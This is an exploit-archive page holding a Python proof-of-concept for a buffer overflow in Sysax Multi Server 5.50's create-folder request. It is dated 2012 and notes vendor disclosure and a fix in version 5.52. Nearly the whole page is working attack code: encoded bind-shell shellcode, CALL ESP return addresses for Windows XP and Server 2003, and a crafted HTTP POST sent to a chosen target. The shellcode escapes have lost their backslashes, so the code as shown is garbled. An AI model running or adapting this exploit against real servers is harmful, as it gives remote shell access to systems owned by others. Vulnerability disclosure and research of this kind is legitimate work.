Home / exploits Sysax Multi Server 5.50 Buffer Overflow
Posted on 18 January 2012
#!/usr/bin/python ########################################################################################################## #Title: Sysax Multi Server 5.50 Create Folder BOF #Author: Craig Freyman (@cd1zz) #Tested on: XP SP3 32bit and Server 2003 SP2 32bit(No DEP) #Date Discovered: January 13, 2012 #Vendor Contacted: January 15, 2012 #Vendor Response: January 16, 2012 #Vendor Fix: Version 5.52 released on January 17, 2012 fixes issue #Additional exploit details, notes and assumptions can be found here: #http://www.pwnag3.com/2012/01/sysax-multi-server-550-exploit.html ########################################################################################################## import socket,sys if len(sys.argv) != 5: print "[+] Usage: ./filename.py <Target IP> <Port> <SID> <XP or 2K3>" sys.exit(1) target = sys.argv[1] port = int(sys.argv[2]) sid = sys.argv[3] os = sys.argv[4] if len(sid) != 40: print "[X] Something is wrong with your SID, it should be 40 bytes long." print "[X] Refer to http://www.pwnag3.com/2012/01/sysax-multi-server-550-exploit.html" sys.exit(1) #msfvenom -p windows/shell_bind_tcp LPORT=4444 -e x86/shikata_ga_nai -b "x00" #[*] x86/shikata_ga_nai succeeded with size 368 (iteration=1) shell = ("xdaxdcxd9x74x24xf4x5fx2bxc9xb8xb7x6exc5xe9" "xb1x56x83xc7x04x31x47x14x03x47xa3x8cx30x15" "x23xd9xbbxe6xb3xbax32x03x82xe8x21x47xb6x3c" "x21x05x3axb6x67xbexc9xbaxafxb1x7ax70x96xfc" "x7bxb4x16x52xbfxd6xeaxa9x93x38xd2x61xe6x39" "x13x9fx08x6bxccxebxbax9cx79xa9x06x9cxadxa5" "x36xe6xc8x7axc2x5cxd2xaax7axeax9cx52xf1xb4" "x3cx62xd6xa6x01x2dx53x1cxf1xacxb5x6cxfax9e" "xf9x23xc5x2exf4x3ax01x88xe6x48x79xeax9bx4a" "xbax90x47xdex5fx32x0cx78x84xc2xc1x1fx4fxc8" "xaex54x17xcdx31xb8x23xe9xbax3fxe4x7bxf8x1b" "x20x27x5bx05x71x8dx0ax3ax61x69xf3x9exe9x98" "xe0x99xb3xf4xc5x97x4bx05x41xafx38x37xcex1b" "xd7x7bx87x85x20x7bxb2x72xbex82x3cx83x96x40" "x68xd3x80x61x10xb8x50x8dxc5x6fx01x21xb5xcf" "xf1x81x65xb8x1bx0ex5axd8x23xc4xedxdexedx3c" "xbex88x0fxc3x51x15x99x25x3bxb5xcfxfexd3x77" "x34x37x44x87x1ex6bxddx1fx16x65xd9x20xa7xa3" "x4ax8cx0fx24x18xdex8bx55x1fxcbxbbx1cx18x9c" "x36x71xebx3cx46x58x9bxddxd5x07x5bxabxc5x9f" "x0cxfcx38xd6xd8x10x62x40xfexe8xf2xabxbax36" "xc7x32x43xbax73x11x53x02x7bx1dx07xdax2axcb" "xf1x9cx84xbdxabx76x7ax14x3bx0exb0xa7x3dx0f" "x9dx51xa1xbex48x24xdex0fx1dxa0xa7x6dxbdx4f" "x72x36xcdx05xdex1fx46xc0x8bx1dx0bxf3x66x61" "x32x70x82x1axc1x68xe7x1fx8dx2ex14x52x9exda" "x1axc1x9fxce") #No DEP bypass :( if os == "2K3": junk = "x41" * 648 jump = "xDFxF2xE5x77" #77E5F2DF CALL ESP kernel32.dll buf = junk + jump + "x90" * 10 + shell + "x44" * 1000 if os == "XP": junk = "x41" * 667 jump = "xF0x69x83x7C" #7C8369F0 CALL ESP kernel32.dll buf = junk + jump + "x90" * 50 + shell + "x44" * 1000 print "================================================" print "[*] Sysax Multi Server 5.50 Create Folder BOF" print "[*] ------------------by cd1zz------------------" print "[*] Launching exploit against " + target + "...." print "================================================" head = "POST /scgi?sid="+sid+"&pid=mk_folder2_name1.htm HTTP/1.1 " head += "Host: " head += "User-Agent: Mozilla/5.0 (X11; Linux i686; rv:9.0.1) Gecko/20100101 Firefox/9.0.1 " head += "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 " head += "Accept-Language: en-us,en;q=0.5 " head += "Accept-Encoding: gzip, deflate " head += "Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 " head += "Proxy-Connection: keep-alive " head += "Referer: http://"+target+"/scgi?sid="+sid+"&pid=mk_folder1_name1.htm " head += "Content-Type: multipart/form-data; boundary=---------------------------1190753071675116720811342231 " head += "Content-Length: 171 " head += "-----------------------------1190753071675116720811342231 " head += "Content-Disposition: form-data; name="e2" " head += buf+" " head += "-----------------------------1190753071675116720811342231-- " try: s = socket.socket(socket.AF_INET,socket.SOCK_STREAM) s.connect((target, port)) s.send(head + " ") print "[*] Payload sent!" print "[*] Go check your shell..." s.recv(1024) s.close() except: print "[X] Meh! Fail!"
